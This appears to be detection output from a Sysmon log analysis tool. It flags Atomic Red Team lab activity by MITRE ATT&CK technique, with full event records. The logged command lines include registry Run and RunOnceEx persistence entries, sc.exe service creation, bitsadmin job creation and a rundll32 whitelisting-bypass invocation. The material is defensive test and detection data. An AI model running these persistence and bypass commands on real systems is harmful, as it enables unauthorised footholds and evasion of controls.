SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3603 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.180 + 747F3D96-D772-5D31-0000-001031EB2800 + 6472 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3600 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.056 + 747F3D96-D772-5D31-0000-0010BEE52800 + 3216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3599 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.388 + 747F3D96-D765-5D31-0000-001024C32800 + 4264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3596 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.314 + 747F3D96-D765-5D31-0000-0010D7BD2800 + 5824 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966634 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:13:38.586 + 365ABB72-77A2-5C91-0000-00100A570100 + 1636 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-777F-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-777F-5C91-0000-00100B590000 + 516 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966633 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:13:38.576 + 365ABB72-77A2-5C91-0000-00106D560100 + 1628 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-777F-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-777F-5C91-0000-00100B590000 + 516 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3593 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.201 + 747F3D96-D765-5D31-0000-001027B72800 + 6584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3588 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.337 + 747F3D96-D739-5D31-0000-0010B2C22600 + 6896 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3585 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.225 + 747F3D96-D739-5D31-0000-0010E4BB2600 + 4744 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3583 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.142 + 747F3D96-D739-5D31-0000-00104CB72600 + 5000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3581 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence or Exec - Services Management + 2019-07-19 14:44:08.269 + 747F3D96-D738-5D31-0000-0010D8AA2600 + 4260 + C:\Windows\System32\sc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Service Control Manager Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + sc.exe start AtomicTestService + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF + 747F3D96-D738-5D31-0000-001056A62600 + 2556 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3580 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:08.227 + 747F3D96-D738-5D31-0000-001056A62600 + 2556 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3577 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence or Exec - Services Management + 2019-07-19 14:44:08.181 + 747F3D96-D738-5D31-0000-001098A22600 + 1700 + C:\Windows\System32\sc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Service Control Manager Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF + 747F3D96-D738-5D31-0000-001046A02600 + 4216 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3576 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:08.146 + 747F3D96-D738-5D31-0000-001046A02600 + 4216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966563 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:41:17.288 + 365ABB72-61FD-5C91-0000-0010536A1200 + 2340 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.EXE /c malwr.vbs + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3574 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:43:03.271 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3574 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:43:03.271 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3573 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:42:53.277 + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4B8-5D31-0000-0010A8CE0600 + 4416 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3657 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.619 + 747F3D96-D83E-5D31-0000-0010F0D02E00 + 752 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb + C:\Windows\AppPatch\Custom\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + 